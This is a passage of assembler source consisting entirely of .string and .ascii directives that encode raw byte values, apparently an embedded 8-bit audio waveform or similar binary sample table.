"\022\026\022\021\017\013\b\b\005\004\005\001\002\377\376\375\375\374\377\377\375\376\372\370\364\361\356\356\353\353\353\350\350\345\345\344\346\346\354\355\360\363\361\361\357\356\354\356\354\357\356\356\360\356\357\357\362\362\366\365\367\367\363\361\355\351\346\345\340\340\334\330\326\321\317\316\317\317\325\326\331\333\333\335\335\336\340\345\347\355\360\363\370\373\376\003\b\013\022\024\030\030\027\027\025\023\023\024\022\024\021\020\016\013\n\013\013\r\021\017\022\020\016\f\n\007\007\006\004\007\003\003\003\002\003\005\006\t\f\013\017\r\013\t\b\006\006\006\004\005\002\001\377\375\374\376\377\001\004\004\006\003\002\377\376\372\372\370\367\367\362\361\356\354\352\352\350\351\350\345\344\337\335\332\331\327\331\331\333\336\336\342\343\346\352\362\366\377\005\t\017\020\023\024\025\025\031\030\031\032\030\030\027\026\026\030\030\033\032\031\030\024\021\r\n\006\006\003\002\377\372\371\364\364\362\364\364\371\370\372\372\367\366\365\365\364\367\364\370\366\366\366\370\367\374\374" .string "\001\003" .ascii "\003\373\373\365\364\357\361\354\355\353\344\347\326\377\021" .ascii "\030\310\335\363\330\3738\020\r(\334\373 \027\366\356\374\031" .ascii "\016TJ1\37084\311\033" .string "\326\316\315\320\024\033\355\327\372\006\"TR=%\t\363\317\306\344\321\352\367\305\360\364\355\337\350\001\375\n\003\357\334\323\301\260\235\261\267\257\253\254\257\325\376\334\346\332\323\354\331\314\351\342\365\355\307\322\273\323\305\265\330\360\006\030\016\022>9CL\\B<<\037%&@-\026\032\033\n\006\027\0364J.\0344\032\035\f\006\034\030+\020\024$\016\0170\026\032+\005\027\022\362\365\004\350\327\365\347\344\361\341\350\356\002\357\343\360\002\005\357\353\364\370\351\363\330\346\002\374\377\344\352\020\016\022\017\033)\035/.FV@02!\"-\020\b\025+&$.'+\037\034\"\035%)\020\352\363\352\365\b\002\032%)650:\f\022\020\016\031\365\365\364\357\372\n\360\f1A2'0\027\026\374\354\320\312\343\333\274\324\321\305\315\305\306\315\342\311\321\321\332\355\340\321\312\325\346\313\316\317\301\337\321\315\353\373\364\376\346\364\005\r\005\347\365\007\026" .string "\004\024\016\t\002\360\002\036\031\0312?A=*\f\020\r\016\b\374\b\374\003\373" .string "\036ENV.EN.'\017\f\373\r\335\311\316\311\303\304\315\342\363" .string "\020\372\364\007\021\360\366\374\366\374\360\314\335\335\320\350\311\354\373\371\001\346\001\022\376\003\372\373\022\372\352\344\366\364\341\362\375\022++\036\026-1'6415,\027\032,&\031(\0341aSY]f^IL<@9\026\017\023\016\017\016\370\001\037(\034\035\017\007\021\367\352\351\360\373\357\333\351\363\354\353\360\343" .string "\f\364\376\373\372\b\375\360\b\016\027\001\367\006\002\374\355\344\350\364\362\366\336\330\350\354\345\337\364\355\336\324\300\305\264\314\306\270\321\341\364\335\355\361\366\003\354\337\364\360\363\341\311\333\343\353\350\346\366\007\005\r\003\r!\033\036\032\021\025\016\364\357\004\b\023\021\b\032\032\020\013\005\001\017\t\374" .ascii "\032\016\030\021\005'\037\032\030\020\030%\r\020\006\f\026\371" .ascii "\360\343\354\372\365\337\346\364\356\361\353\354\003\006\376" .ascii "\376\366\r\032\003\377\374\362\367\377\344\324\357\346\334\353" .ascii "\342\375\005\363\373\373\006\027\031\006\007\004\007\372\361" .ascii "\360\362\005\372\361\373\013\026\022\025\030 /$\034\024\037#" .ascii "\b\007\036&.6.*<G+582:%\034\037\034\032\n\371\006\016\023" .string "\372\354\367\361\371\364\362\374\032\036\022\r\b\020\017\021\t\n\021\030\023\013\021!-\"0;@L6/2\037\033\005\363\367\356\362\351\326\342\361\363\353\342\362\363\345\323\317\310\317\323\301\273\300\315\304\271\265\315\314\316\336\323\330\345\346\324\316\330\327\326\306\261\312\304\300\311\266\313\346\351\335\334\352\361\356\345\335\346\001\362\331\325\331\331\331\322\306\335\347\367\376\t\"(!\"#\035)#\n\364\005\006\362\371\356\001\023\017\026\027*3)%\037(5%\037\032\026+\"\025\"6:/66<B5*$(7)\022\030\025\021\r\021\n (\034+%&-\037\b\017\024\024\002\362\364\360\372\364\363\374\002\021\021\005\013\030\030\023\017\026\037\032\016\374\370\352\354\341\325\342\354\363\342\345\352\355\372\344\332\350\324\322\300\251\257\252\261\254\256\307\337\343\344\343\366\t\005\006\013\021\r\022\b\377\004\b\025\r\03447<73-51\027\031\036\020\f\005\363" .string "\374\365\367\366\002\020\020\b\f\020\033\020\020\f\006\r\004\360\355\370\353\360\364\364\006\021\020\n\001\016\022\001\002\374\001\376\372\356\337\363\352\340\346\337\360\001\370\372\365\371" .string "\361\364\346\347\343\316\320\313\324\335\331\332\346\360\370\373\370\364\364\370\363\350\340\345\341\315\305\303\311\312\313\326\325\347\363\355\364\367\370\006\003" .string "\006" .ascii "\001\366\362\357\356\375\364\361\376\376\t\007\b\013\017\027" .ascii "\n\r\017\016\006\002\372\365\374\005\001\002\r\022\032\022\025" .ascii "\030\036$\027\033%\036 \031\013\013\f\030\031\031()6?5CD<5-+" .ascii "\"\034\022\007\007\b\006\f\n\016\021\021\013\005\001\376\372" .ascii "\352\354\355\347\362\356\347\371\365\004\r\005\025\032\035!$" .ascii "1302)190141*&\"\026\030\030\017\n\b\017\r\b\001\377\372\365\363" .ascii "\345\340\353\333\333\336\325\345\345\336\342\342\345\351\334" .ascii "\341\330\332\340\323\330\325\317\317\315\307\311\323" .string "\320\316\327\330\335\334\333\325\317\325\322\312\313\316\315\310\313\315\312\325\323\317\322\316\321\331\321\321\325\320\326\327\330\335\337\341\331\327\340\335\340\340\342\342\345\353\344\345\355\357\357\356\367\373\366\001\001\006\013\024\030\026\037\030!% #$\035\"\037\032 \034\035\033\036\"&++&..+,-0'.'%)(# \"(*+10.-3,24-72,60/7-./)+$\"\033\031\030\020\024\020\013\003\374\371\363\353\351\341\332\335\336\335\334\350\350\347\357\364\365\371\376\373\370\377" .ascii "\002\t\004\023\027\022$ $*$#\035\031\030\f\005\374\361\365\356" .ascii "\351\353\361\357\350\350\351\351\342\340\336\334\327\337\327" .ascii "\321\322\320\317\313\322\313\326\327\317\332\323\324\334\325" .ascii "\324\332\331\332\323\315\315\314\313\313\317\324\326\326\327" .ascii "\326\326\332\336\332\333\340\341\343\334\335\327\323\321\316" .ascii "\323\322\332\330\331\342\343\345\357\350\353\362\351\364\351" .ascii "\342\346\340\337\342\347\352\361\362\370\370\377\006\t\016\020" .ascii "\026\027\034\031\022\025\027\025\030\034#'(-'(-0016+0(\")\037" .ascii "!%\"%,*+*).3//-+)!! !\034$%'+()(1.1357/1*\037 \033\027\032\f" .ascii "\023\022\t\017\b\007\007\002\374" .string "\373\365\353\345\332\327\322\323\324\330\333\340\347\347\355\361\367\372\002\t\b\016\020\016\f\r\022\023\031\032\030\036\036\026\033\022\r\023\006\b\007\376\376\366\357\355\353\351\345\346\345\340\337\337\340\335\336\341\337\336\341\335\333\326\325\323\322\326\323\325\325\330\327\326\333\330\332\337\327\333\341\327\333\325\323\325\317\320\327\326\331\332\331\334\335\340\336\341\335\336\335\331\330\326\320\321\323\324\332\332\336\334\340\341\337\343\341\343\336\343\344\342\346\344\343\350\351\355\363\367\377\001\003\b\r\f\022\025\032\032 &#&%$!(%#&\037$\035&\032$\027$\020\031\372\027'\364\341\361\350\331\374\017#\3132\"\007\3566T\021c%\031\371\374\334\317\375\316\n\350\350\f\272\346\310\341\007\355\342\332\305\376\007'\037\330\016\007\b\335\007\024\350\341\007\370\344\376\005+\0161\033\336\035\024\320\337\037\"\375\003\024\001\006\f\342\002\342\346\335\301\322\305\260\203\276\266\270\301\323\321\365\035" .string "'RX0QW,-8\"0,6\033\r\n\372\336\331\013\351\323\315\340\340\341\323\373\336\002\020\344\017\021\023\337\371\023\006\r\013\t\375\n\017\001 \037\035\356\013\021\035\032\0077\030+$EEN1\0308=&\005\004\006\370\334\367\366\367\360\305\326\376\003\361\346\016\031\035\0161'+*\035 %M\364\n\020\f\017\r\022\373\001\375\021\020\023\371\325\320\351\363\347\345\345\352\315\306\341\312\341\314\303\326\337\360\330\346\367\365\353\0277F8>QGPM?1J$\f\031\f\016\351\333\365\357" .ascii "\371\347\355\362\363\351\356\366\362\306\335\355\367\361\343" .ascii "\352\300\337\357\350\342\337\305\250\303\307\310\262\274\311" .ascii "\325\375\374\027&8/\t+D*\031#06)$\r\374\361\330\330\316\335\266" .ascii "\250\263\272\343\300\363\377\350\357\b\f\017'\374\024\376\013" .ascii "\373\327\351\336\343\343\b\023\025\007\375\t -\003\032'$9$>;" .ascii "**'!/>\017\b\002\016\365\362\003\355\355\353\367\005\031\352" .ascii "\350\371\361\356\363\357\357\371\340\356\003\006\025\007\005" .ascii "\023 3\036\023'0\373\0325-5ELQoYB*9" .string "%\005\004\374\357\316\314\322\321\344\332\336\342\354\357\335\312\337\315\241\276\331\371\357\370\372\376\005\375\001\377\004\351\333\344\002\363\374\377\374.+5KWKB4JT1-!\"\020\016\026\002\372\360\332\325\320\331\267\246\266\254\272\267\304\304\302\346\351\336\376\373\345\353\367\371\351\355\345\346\334\342\354\355\367\350\343\344\362\372\003\375\376\360\362\016\033(\025\030!&*!\007\355\355\342\324\332\333\340\323\332\335\353\370\376\372\341\375\374\356\346\342\326\307\323\310\336\333\342\327\325\366\366\373\367\n\366\374\013\036)146=JD,CE+\027\036\034$\005\372\004\026\031\034\020\b\025\002\b\020\036\006\367\t\031\030!\005\367\016\n\021\001\001\355\325\317\334\360\320\334\344\343\365\006\033\0378<<:LVKF92%.'*(\034\367\354\023\370\341\354\352\350\345\336\335\327\330\342\351\371\027\023\004\372\b\b\353\360\365\354\351\363\336\355\373\326\317\346\020\376\360" .string "\376\004\375\016\032 $\035\021\026/\"\017\003\373\364\355\364\374\375\370\361\004\t\004\002\374\005\366\363\371\372\373\365\350\357\375" .string "\003\371\350\347\353\341\334\314\320\306\300\314\337\335\344\322\305\337\325\346\340\350\325\321\315\306\316\305\277\276\314\315\342\341\330\346\355\350\373\020\036\024\031\"'6A7'$\024\375\372\034\363\330\335\332\353\371\021\003\006\022\020!\035+)\031\026\"'\035\037\017\r\022\027\013\r\b\365\343\331\351\344\314\312\330\331\357\356\370\007\024\032\0327=7,#++*1,$\030% --\027\003\r\024\021'\03452EVOPSA+87.\024\001\372\360\344\355\355\351\343\334\316\316\315\304\246\250\266\265\301\307\342\327\337\332\366\r" .string "\005\360\005\375\360\362\370\377\367\006\006\034//, &(#\033#\020" .string "\372\007\017\007\013\372\006\023\027\017\t\005\363\366\374\366\374\377\374\375\005\013\016\b\002\377\373\355\337\350\325\312\272\306\305\312\317\313\326\327\340\320\332\340\344\320\316\336\340\333\343\352\347\357\357\352\346\347\323\302\274\305\277\275\304\315\326\352\376\n\025 #\030%.\035\023\025\036\005\013\017\t\020\006\013\023\030\016\007\372\001\374\t\373\017\036\0170*1:D5'+,$\023\024\n\001\003\003\003\001\005\361\355\371\004\367\351" .string "\355\347\352\003\r\005\013\006\037\032 \034\027\025\021\017\377\023\t\004\n\026!-:22:9+\"0$\025\034\033\032\024!\037!\"\035\031\n\006\375\353\347\341\332\341\341\350\352\357\367\373\374\372\365\352\353\360\353\344\343\357\357\373\002\n\017\032\037\017\020\031\036\001\005\f\013\f\006\365\371\001\001\356\353\356\330\321\301\323\313\307\310\315\327\346\357\357\370\003\375\362" .string "\002\003\367\002\002\003\013\016\n\007\021\001\365\367\363\351\341\330\344\335\340\367\362\377\016\001\t\024\027\020" .string "\b\001\370\351\352\345\340\337\333\336\340\342\327\324\330\336\317\314\327\327\322\327\327\345\353\354\346\342\357\347\336\345\360\350\351\343\360\350\362\366\370\b\005\026\016\007\005\016\375\t\021\n\022\022\037\"220/71$$$\036\030\036%,+.53<B,6.$\035\033\033\030\025\021!\032.\"$+,&\035)&%\032(#)&\"\034\027\025\006\372\362\365\336\324\326\326\320\314\320\322\322\315\310\306\316\323\306\306\323\333\333\336\340\360\367\373\n" .string "\021\f\375\374\372\376\365\366\001\n\r\025\")152.31\036\031\032\032\n\n\013\n\f\f\n\005\f\003\366\352\373\366\346\342\353\353\350\362\366\003\377\t\r\002\f\377\370\366\364\366\342\351\352\352\351\352\347\344\354\345\330\321\327\317\307\315\324\327\330\336\336\341\355\347\340\331\340\331\314\316\314\316\324\321\332\340\344\365\360\360\356\356\340\337\345\323\315\330\335\340\341\354\370\001\017\016\f\023\034\024\021\025\036\033\034&*249388+!%)\030\027\026\"\030\") 0..-1-'\035$%#\"+0'1%\036$\033\f\005\004" .string "\365\371\375\001\004\016\024\031%'!\032!\027\n\001\004\376\373\372\366\375\366\363\354\356\353\330\313\301\307\276\263\260\257\264\276\317\326\336\357\355\354\365" .ascii "\001\372\377\004\006" .string "\005\024\031\033#+%'/!\031\027\031\017\n\f\024\023\026\034\031 \035\031\f\f\016\002\377\376\005\372\376\376\375\005\n\f\373\007\377\361\352\352\360\347\333\345\363\356\374\364\367\373" .string "\367\354\367\360\354\337\353\355\347\360\357\362\365\372\366\356\361\354\336\322\325\322\310\307\313\320\317\327\325\331\334\343\341\331\344\340\331\326\333\342\334\344\353\355\361\351\345\350\355\347\336\332\354\343\337\351\365\377" .string "\016\021 !&\034$+\037\033\033&$))....#$( \021\006#" .string "\374\367\361\035\032,\020260A,TI+67'\"\024\371\001!\023\t%+\037#\024A(*3\3632\r\017\013\360\361\333\340\363" .string "\344\356\367\375\371\006\373\363\361" .string "\353\300\311\314\304\243\254\276\274\330\353\361\352\005\032\027\036\035,\020\032\374\373\f\376\013\364\352\022\"\f+\374\016)\f\013\364\002\370\336\331\341\336\345\356\337\341\370\376\335\342\354\374\375\375\022\003\027\030\b\356\356\r\361\343\336\311\347\342\316\337\342\374\r\f\006\022\026\032\020\367\367\002\n\356\355\354\367\370\376\007\004 \036\017\002\002\002\363\316\310\323\323\331\321\326\326\364\357\344\374" .string "\021\r" .string "\013\f\006\037\377\357\006\001\004\362\366\364\366" .string "\370\371\b\036\037\030\024\036$!\023\002\n\030\025\376\365\001\021\004\376\t\035-, \034*\037\027\376\366\001\352\341\350\334\355\374\366\377\t%('$\023\030\033\021\007\003\f\024\b" .string "\013\r\033\032\005\b\024!\024\375\007\021\013\b\364\364\373\371\353\335\325\350\360\327\337\346\361\375\373\365\373\t\013\376\373\373\375\373\355\344\337\360\001\374\001\0251?E@8HF<\"\033#\036\007\375\005\022\037\024\027\022\",\017\001\005\013\373\343\336\334\341\341\322\312\336\361\361\360\363\373" .string "\006\006\375\373\013\003\362\353\355\363\345\330\310\310\324\334\316\310\330\355\366\350\357\370\375\004\354\335\343\356\333\306\302\315\335\335\335\335\361\373\377\360\353\365\357\344\324\313\304\306\303\270\266\311\335\341\344\353\374\n\023\n\002\016\023\025\001\377\013\020\016\003\375\t\035\025\r\f )\037\027\030*/*\033\025\" \016\377\001\f\021\026\024\035+<912<9)\031\n\n\004\377\354\350\374\013\n\007\027+8:.-;<)\025\024\032\031\n" .string "\004\023\033\021\007\023\036\027\007\372\375\373\364\344\327\323\327\327\311\301\311\330\332\335\340\345\370\006\004\002\f\033\036\020\007\002\006\b\366\351\354\002\006\373\377\017&)#\035$/&\016\376\002\001\364\345\343\352\365\373\364\366" .string "\017\013\373\371\367\364\355\337\315\315\323\324\306\305\326\342\353\347\350\364\004\n\367\357\377\006\376\353\344\353\357\347\332\316\333\354\337\327\331\352\366\364\356\364\375\005\377\354\353\353\347\331\322\313\325\341\344\345\345\373\b\013\376\377\002\375\371\343\324\327\340\325\311\317\346\370\374" .string "\007 2/$&87)\032\035$#\035\020\024#, \034%--% \033$%\033\016\016\032\025\f\006\005\017\031\026\016\026)4-)096'\024\t\022\013\367\343\353\376\376\376\003\023%/%\034'1\"\r\004\001\003\372\357\352\354\370\373\363\361\371\374\371\360\342\335\336\336\313\274\301\313\313\302\304\316\343\356\353\351\373\024\027\r\r\036'%\030\016\024\032\021\372\365\377\003\375\366\373\005\022\024\017\016\027\037\021\003\372\367\364\355\343\326\340\355\363\355\360" .string "\016\r\002\374\372\001\365\335\317\330\335\317\304\307\331\347\355\347\352\001\017\b\372" .string "\f\f" .string "\365\362\367\372\354\342\344\354\357\351\347\351\360\366\367\354\352\365\371\361\341\342\345\343\336\322\315\333\352\344\337\350\376\013\t\005\007\025\030\013\366\365\375\370\350\340\354\371\004\007\f\0330;318>6,$\035 \037\027\r\023! \036\035\036%)\"\026\024\036\037\017\004\007\017\r\003\376" .string "\021\026\r\f\031()# )++\034\021\024\024\t\365\365\366\373\371\370\372\002\023\024\023\023\031\031\024\007\374\365\356\352\333\322\327\340\343\335\341\347\357\360\351\336\342\352\337\323\314\327\332\331\331\336\354\373\003" .string "\013\033%! ')+& \031\032\030\f\003" .string "\001\375\373\371\366\370\377\002\373\374\001\004\377\371\364\356\362\355\341\334\345\356\352\352\360\376\004\005\377\376\002\001\370\345\342\343\333\320\316\320\331\340\344\350\360\377\004\001\001\006\006\377\376\366\361\362\361\354\344\352\351\352\351\346\343\344\352\344\335\335\346\344\340\332\332\337\337\337\330\333\347\353\352\354\372\005\t\f\021\026\034\037\027\022\022\022\b\002\002\002\005\b\016\021\032$*,/3/.+#\033\032\032\021\r\020\027\031\032\034\034#$\036\023\025\027\017\005" .string "\005\003\003\001\001\b\021\023\016\025\037!\036 \"#%\"\037\030\030\025\013\006\002\377\372\373\370\365\365\374\377\372\374\374\376\371\364\353\345\345\341\330\320\331\335\334\337\346\361\365\374\375\372\002\005\375\365\373\372\371\366\371" .string "\004\020\024\027\037**())(!!\030\022\020\016\013\005\006\001" .string "\377\375\370\365\372\366\361\357\365\364\361\362\360\361\362\360\351\352\361\362\357\355\367\372\374\375\375\376\001" .string "\366\362\360\354\341\334\335\333\333\336\345\346\356\365\370\372\375\377\371\371\370\361\351\347\347\340\335\335\340\341\342\342\337\343\345\340\326\331\334\327\323\324\330\332\340\341\345\355\366\373\373\004\r\020\021\024\031\033\036\036\036\033\035\032\024\021\017\r\005\t\n\t\f\016\025\025\030\031\032\032\034\025\020\023\020\013\005\n\016\f\017\020\024\026\031\025\020\023\021\n" .string "\001\377\373\372\371\375" .string "\007\t\f\023\032\030\026\032\031\030\023\024\021\013\n\006\002\376\375\371\363\363\360\351\344\350\343\336\334\337\341\337\342\337\342\344\346\342\343\354\360\361\364\377\005\013\020\024\030\035!\033\031\032\031\022\r\020\016\016\017\024\026\033 !#$\035\033\033\026\017\f\f\007\004\003\003\002\004\003\376\376\377\375\365\363\366\363\360\357\362\361\364\365\364\366\374\376\371\375\001\003" .string "\002\005\003\006\004\003\001\001\377\365\362\360\356\347\347\352\351\351\354\360\357\365\364\365\362\364\361\350\350\347\345\335\337\342\342\344\347\351\352\360\357\354\355\360\360\352\355\360\361\363\366\374\001\n\016\022\027 !\036#%% #\" \035\031\025\027\021\r\f\r\t\003\007\007\007\005\t\n\013\017\f\013\013\016\b\004\006\t\b\005\013\r\017\020\017\016\017\021\n\005\002\003\373\365\366\366\367\367\374\376\002\007\007\007\b\013\005\001" .string "\377\370\362\362\355\352\346\344\340\337\337\331\326\326\327\322\320\324\326\327\331\337\342\351\357\362\365\375\005\005\t\017\027\027\031\036 \"\"\"\036\036\034\024\r\013\t\003" .string "\002\003\002\004\007\007\n\013\013\007\b\t\001\376\376\375\366\367\371\373\373\373\373\372\374\373\365\361\364\362\354\351\354\354\351\354\356\357\365\365\366\363\372\370\367\367\375\376\375\373\377\377\376\376\373\367\367\374\355\375\371\372\346\375\002\r\357\332\371\316\317\354\b\341\0273\017\002\021\032\374\364\025$\0060-\030\036\023\035\027\367\360\356\353\304\276\001\307\336\375\305\347\331\322\330\316\325\371" .string "\370\030\033\t\007\f\365\327\302\345\032\344\333\f\367\330\001$\374\007\360\353\025\341\363\037\361\f-\027\017\376\366\334\277\272\317\350\332\340\007\377\002\025\027,\f\367!\035\0064Q\"!4\031\371\355\006\005\366\371\022" .string "\347\364\361\334\335\f\001\003\357\335\374\327\333\025\f\r#\035\025\007" .string "\003\026\002\020<%\0166*\013+$((\021,,\372\032:\017\0176!#\036\006\026\361\344\372\b\360\374.\f\367\031\036\03201:=+GQ1+0\034\f" .string "\366\005\352\314\354\346\313\350\003\337\314\321\277\300\300\303\342\336\332\036\"\006!\032\002\376\361\001\373\351" .ascii "\r" .string "\006\004%+1<5:.\021\033%\370\372\026\f\377\026\036\b" .string "\356\353\330\277\323\324\313\326\351\330\277\312\307\313\314\311\360\372\352\022\"\007\026\032\013\004\376\371\367\341\310\347\332\301\337\363\350\354\352\334\325\255\264\321\307\320\006\013\367\r\376\353\332\310\331\336\313\335\006\363\356\021\033\032*901\037\033\032\377\374\f\370\341\363\352\324\315\312\327\327\313\346" .string "\352\355\005\377\372\002\004\003\b\006\037/\0355K,-9.%\021\020\032\001\364\007\003\364\004\024\b\f\006\376\375\352\362\f\n\n14&/0&\031\013\013\031\005\n!\022\t\032\036\036,:F?-3;\030\0261\033\016\032\013\374\354\330\333\327\305\330\357\333\334\343\304\253\251\253\276\310\322\376\025\n#7\"'*!%\032\017\030\t\367\021\025\016&7)\032\022" .string "\366\335\332\364\361\357\f\031\006\013\006\372\363\347\353\364\351\352\006\370\353\374\372\362\362\362\364\363\337\341\362\343\340\373\370\353\366\356\344\331\305\317\312\271\317\346\332\337\362\355\337\331\326\340\343\342\005\025\013\034%\021\006\003\363\350\335\323\333\320\305\337\351\345\373\r\020\016\002\374\374\354\346\375\376\365\013\r\365\364\356\346\345\337\356\004\372\373\025\022\004\026\036\032 \034!\"\024\031'\033\03782*/$\030\r\366\371" .string "\353\367\017\007\005\013\006\376\374\375\016\027\0303A5>OA;>;7'\037$\030\003\021\024\b\022\034\030\026\023\b\b\377\375\023\027\022!'\023\n\001\370\371\355\363\b\003\377\016\004\354\346\332\317\315\320\333\342\330\345\374\363\371\023\026\020\021\n\001\370\352\362\375\374\017))-2$\032\020\n\024\025\016\036+\031\027\037\024\f\007" .string "\377\361\342\353\343\323\341\351\334\337\347\333\321\306\301\311\304\313\351\366\363\003\003\364\356\343\332\335\330\331\354\351\346\370\366\356\363\366\360\355\346\352\361\345\352\377\377\373\t\005\366\353\332\314\276\261\272\306\303\325\360\355\355\367\364\360\357\360\374\006\002\016\030\016\f\021\t\b\f\b\016\007\375\006\003\364\376\013\001" .string "" .string "\372\361\344\341\355\361\367\027$\"01$\034\033\027\032\027\036/)%/-!!\035\031\031\016\r\022\n\n\033\034\036,+\"\030\r\006\376\357\373\f\006\r \037\030\035\033\032\032\031#&!*0 \036!\025\016\013\005\004\373\355\363\364\342\341\337\315\302\270\257\257\256\261\306\322\335\373\013\b\017\024\t\001\374" .string "\b\005\016%*):<23,\"\033\022\f\r\004\004\023\020\013\016\t\372\355\333\324\321\301\307\326\323\323\337\332\322\322\315\317\320\323\345\362\360\377\022\b\b\017\n\004\375\365\364\354\335\343\342\330\334\337\323\316\311\276\275\272\273\320\333\340\366\004\374\372\367\355\345\332\332\343\340\343\367\371\365\004\007\374\374\373\364\357\345\346\356\345\347\370\371\365\374\373\365\363\352\353\360\354\364\004\003\005\022\r\006\005\002\005\006\004\023#\035&73052-)#$\035\022\033\034\020\024\034\016\b\006\377" .string "\373\373\n\025\023\"*$#\036\026\022\r\013\025\022\023%'!+3,+)((\031\031#\034\030%\"\027\026\r\375\363\350\343\340\326\330\342\325\314\315\304\274\272\273\305\323\327\352" .string "\005\021\"$#(%\"\035\026\035\031\017\033&\033\033!\026\f\003\374\373\370\365\003\n\007\025\030\016\n\b\374\367\361\356\367\361\355\371\371\356\356\355\343\340\327\326\333\326\331\353\357\357\002\005\376\375\372\362\350\336\340\344\331\334\353\346\340\344\337\327\327\323\326\336\336\353\370\367\375\t\004\376\376\370\364\355\344\352\354\342\351\365\357\357\362\354\347\341\335\340\336\332\354\361\352\366" .string "\367\363\367\366\370\367\374\n\013\f\031\036\027\036\035\026\026\023\022\027\025\027)+)580)\"\033\024\007\006\r\005\006\023\021\013\023\022\f\f\r\024\030\025\"1,.;710)%\037\025\025\026\r\021\030\021\022\026\021\r\013\007\020\017\n\031\"\032\034\"\031\021\013\004\002\370\364\371\362\346\352\344\320\316\313\303\301\301\310\325\331\342\372\004\b\027\034\030\031\025\020\021\n\r\030\026\030%%\033\034\030\021\n\001\006\t\001\006\025\020\016\030\023\r\n\005\377\372\361\365\364\347\353\361\345\336\337\331\324\322\316\327\334\334\350\363\361\365\372\362\360\354\351\352\346\344\356\357\346\357\364\351\346\346\342\340\335\336\352\350\353\374\375\370\377\375\356\351\342\332\326\315\320\332\330\330\346\347\343\347\344\343\344\340\344\355\352\360\377\375\376\t\n\005\005\003\005\003\371" .string "\007\375\376\b\003\377\003\001\001\002\005\020\025\027&0).4,&\"\036\035\031\021\027\030\020\023\024\r\013\n\005\006\004\005\022\022\023%+$*,$\035\025\023\022\t\t\023\017\f\030\025\017\021\020\n\t\005\t\017\t\017\033\030\026\033\030\022\016\003" .string "\374\355\352\351\333\323\324\311\301\300\277\302\302\306\327\342\341\362\003\001\005\r\r\f\r\r\023\025\025\"% '*\036\033\031\021\017\b\006\016\016\t\023\025\f\f\006\375\367\355\350\350\341\337\352\346\340\350\351\341\337\337\337\340\333\344\360\356\362\002\002\376\005\001\371\366\357\353\346\335\337\343\332\330\337\332\327\330\330\334\340\337\352\364\362\372\002\375\372\373\364\357\351\344\347\342\333\344\350\335\340\346\336\333\332\332\334\333\336\352\356\357\377\003" .string "\005\b\003\001\377\376\004\377" .string "\n\013\006\013\013\007\007\005\005\f\013\025#&*;<9<;6)\"\031\013\0037" .string "\323\327\364\361\004 \032;\001\t?0\022\022\365\"" .string "!<\"\376\020Q\341\376\023\303\347\356\361E\365\325\314\341\002>N\036;\003\007\351\272\325\326\357\366\360\354\376\004\323\341\336\360\351\321\307\303\251\271\254\225\310\323\325\304\352\330\352\376\366\337\341\314\274\302\254\322\303\317\276\301\316\304\310\317\304\326\006\001\f\017!38*,FB/%'1EB9&-1\027\002\373\034\034$3%:-\037\025\001!<56\"5<\022/\021\r\034\365\342\327\325\313\327\316\320\363\016\007\007\016\026!\005\373\365\353\356\355\325\307\341\331\310\321\311\334\371\352\362\372\007\025\013\013\023&)\022\013\027)@3&368<)!+0\035\013\024\032(\024\017$\"(*$\013\007\006\365" .string "\r%8*)2,!\005\365\361\357\364\354\355\372\025\033\033#;SR=& \016\370\344\313\306\310\312\267\255\275\314\314\302\313\324\337\343\341\333\342\347\340\307\261\276\303\304\272\255\312\321\321\332\325\344\362\360\347\337\346\364\366\342\337\371\377\373\001\006\023#\036\032\020\027(.\036 5&\035\002\347\346\346\335\340\350\374\026$&.M]\\TJGD#\r\004\372\367\352\317\300\311\320\310\304\325\363\004\375" .string "\003\001" .string "\370\346\343\356\356\342\325\322\347\362\342\347\357\363\376\366\350\346\355\362\354\342\343\363\371\357\353\365\004\013\003\005\021\036-)\036\030&%\f\003\007\016\022\013\016\0341ACEK\\bYW_`W?//)$\025\006\006\021\017\f\n\022'2'%1.\037\004\342\326\325\324\321\317\332\361\374\357\360\002\006\005\373\357\367\372\365\354\346\355\376\007" .string "\005\027\035\027\n\375\005\b\371\355\345\335\335\324\274\261\266\273\271\256\260\310\327\334\344\353\362\377\377\360\351\355\356\344\322\311\332\335\322\317\316\326\342\345\340\352\373\n\020\t\t\033%\027\r\t\n\t\371\360\365\001\017\031\025\030')\026\004\376\377" .string "\361\352\357\371\002\n\013\017+83-,56\"\021\013\002\371\346\316\306\316\323\323\322\334\367\007\001\002\017\033\037\027\013\007\t" .string "\362\342\334\346\350\330\321\333\344\351\346\347\366\004\r\f\b\t\026\031\004\367\367\366\363\350\337\355\371\375" .string "" .ascii "\b\030\037\021\013\020" .string "\030\030\007\377\f\026\025\024\027$<GFGNUS<-3+\032\t\373\367\374\371\362\366\005\032'\" ,)\030\007\374" .string "\b\002\370\366\372\003\006\366\363\003\017\017\t\f\0370./7ALM:*,$\021\374\363\375\002\370\363\366\371\377\370\346\335\337\334\317\277\270\305\312\300\275\302\314\327\326\316\321\332\341\336\321\313\326\330\305\266\263\267\272\263\256\266\305\324\333\331\340\371\001\364\351\347\351\347\326\312\320\325\327\324\311\312\332\335\326\324\335\360\376\373\376\020\034! \026\024\032\027\n\375\373\t\020\002" .string "\f\024\025\021\t\r\031\032\023\n\017 '\034\035/;@<6>HB:0.5.\030\r\021\024\022\b\004\025\"%*-4DG6---#\013\375\001\377\365\356\350\353\372\374\364\365\004\022\026\013\n\032\036\027\017\t\r\024\n\373\366\367\377\376\360\356\374\376\363\351\340\341\340\325\312\307\310\317\316\274\266\300\304\300\300\311\331\350\347\351\353\360\372\367\351\350\362\364\362\356\364\t\032\037*;IURD>;3#\016\003\n\005\366\364\366\372" .string "" .string "\376\004\016\027\031\022\024 \035\017\b\003\377\375\363\352\354\363\372\377\374\002\022\024\f\006\004\005\002\365\356\361\363\367\370\363\370\005\005\375\371\374\004\001\367\365\367\362\354\345\325\317\321\313\304\301\310\330\340\343\361" .string "\t\023\021\b\005\002\366\347\326\314\316\306\270\267\275\303\311\314\322\341\354\364\372\371\377\f\n\376\376" .string "\375\367\360\356\364\367\372" .string "\377\006\021\017\007\007\006\005" .string "\366\366\373\373\377\004\004\013\027\031\030\030\034!\037\025\025\032\026\022\016\007\b\013\007\004\005\r\033\037\037.>CGJHGC7+\037\032\031\020\006\t\f\013\r\r\020\027\032\031\032\024\017\016" .string "\357\350\346\343\341\336\345\362\367\377\013\020\031%$ 